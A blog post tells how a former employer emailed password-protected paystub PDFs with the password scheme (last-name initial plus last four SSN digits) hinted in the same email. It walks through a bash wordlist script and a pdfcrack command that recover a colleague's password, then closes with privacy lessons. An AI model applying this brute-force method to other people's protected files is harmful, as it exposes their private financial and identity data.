Friday, January 11, 2013

be very carefull of password encrypted files ( a story from a hacker name ken )

Once in a the past, I happen to work for a small business that had about a zero existence for a security policy or posture. It was horrible to say the least. We had ports open on firewalls that was not require, we lack any type of  password life_cycle or expiration, no remote-authentication, and the same user/password was deployed on the critical business servers. All of the above, was the typically norm around this business.

One area that was also overlooked,  dealt with our company pay_stubs presentations. Yes our own pay information was exposed for the taking to anybody that could intercept email, and had any basic simple skills as a scripter.

Every 2 weeks we would get a clear body text email with a single email  attachment that said the "companyname_paystub.pdf". It was a basic PDF password protected document, I redacted the company name from this posting to protect that of the guilty, but it looked something like this;

Okay simple right.

Yes in deed, it was simple to  hack. In this case the  details of the victim was in the body of the email. The email would provide you the clues to the password. And yes I'm not making this up, the clues where ;

  • 1st letter of your lastname
  • last 4 of your SSN
  • and we could easily enumerate the user name from mailto: address of the email

Yeap all of that was in a clear-text, non encrypted email, & with a simple password protected pdf attachment that was  sent thru possible unlimited or numerous  mail/internet hops.  So if you where between our mailserver and the business that built or e-PayStubs, you could easily harvest privacy information.

Okay I admire they where trying to be green & with saving a tree or two, plus generating less paper, but when you provide sensitive information in a email, and then give clues on how to  crack it. Something is not right !

So let's look how I cracked this using one of my favorite tools known as pdfcrack.



 Okay 1st let's review the clues;

we need a dictionary file that contains the 1st letter of the last name  followed by 4 digits. So the victim in this case, was an email that was intercepted accidentlly by myself. The victim last name started with d, so that told me that I need a combinations of  d0000-9999.

NOTE: The last name of the victim could easily be extracted from the email recipient  address and/or by a little social engineering or a simple directory look up if you had a phone systems that provided the  calling party a directory listing. These systems are cool,  but can lead to recon'd information about your employees and I typically frown upon them, but they do exist in all sorts of business.


Okay simple let's move on and look at how we cracked this egg wide open;

1st I crafted a crude script to generate my dictionary file. My perl scripting skills are bad,  so I used a simple bash shell script or something like the following to build my dictionary;

100:~ kenfelix1$ cat makedict1.sh
#!/bin/bash

#
# ken felix the hacker @ hyperfeed dot com keeping-her-afe :)

#
# my crude simple script for making my dictionary files 0000-thru-9999
#  insert the 1st character of the lastname on the cmd line

for  ((a=1; a <= 9999 ; a++))

do echo  $1$a

done

for  ((b=10000000; b <= 10009999 ; b++))

do echo  $1$b

done


The reason for the 2nd loop entry, was because  I had no quick ideal or way on how to make sequences #s  0000-0999, so  the 2 above loops when executed, and the output redirected to a file, this gives you the sequence #s of   1-thru-10009999 & with your supplied the cmd line  variable of the 1st character of the victims last name.

2nd I then used  a combination of the unix  cat and sed cmds to clean the file up some.

100:~ kenfelix1$ ./makedict1.sh d > myhackingfile.txt ; sed s/d1000/d/g myhackingfile.txt > final.txt
100:~ kenfelix1$ cat final.txt | wc -l
   19999
100:~ kenfelix1$


Okay it's a little bigger than planned, but  still  the file is small in size , and will cover the objected of breaking the password encrypted pdf file.

3rd Okay so now I have this file  starting with;

100:~ kenfelix1$ cat final.txt | head -n 3
d1
d2
d3



and ending with;

100:~ kenfelix1$ cat final.txt | tail -n 3
d9997
d9998
d9999



So that meets my password range for the victims paystub. With pdfcrack you can now supply the wordlist against the pdf file, by execution of the following cmd;

pdfcrack -w "supplied dictionary wordlist" -f "targeted pdf"

And that will crack the  pdf file with your wordlist & if a match is found. So let's run it with my wordlist and against the PDF file;

# pdfcrack -w final.txt victim_paystub.pdf
PDF version 1.4
Security Handler: Standard
V: 2
R: 3
P: -4
Length: 128
Encrypted Metadata: True
FileID: 8ad5392d2b990944a5b5f7ba1d3b000d
U: 61e8eae0e2f9ebd5020487b4c504e19700000000000000000000000000000000
O: 1dbee41c901b7b6c50e4b965eb983b6cf989135e1b37c46a9e0b0cdcc2c89a4d
found-user-password: "d6832


So their you have it, a very simple hack.

Things we all should take away from this post;

  • be careful not to leak sensitive or classified information into a email 
  • don't apply password clues or hints in a unsecured channel
  • protect your clients privacy 
  • just as important protect your employees privacy

I hope this post was helpful

Ken Felix
Freelance Network Security Personnel
kfelix at hyperfeed dot com








No comments:

Post a Comment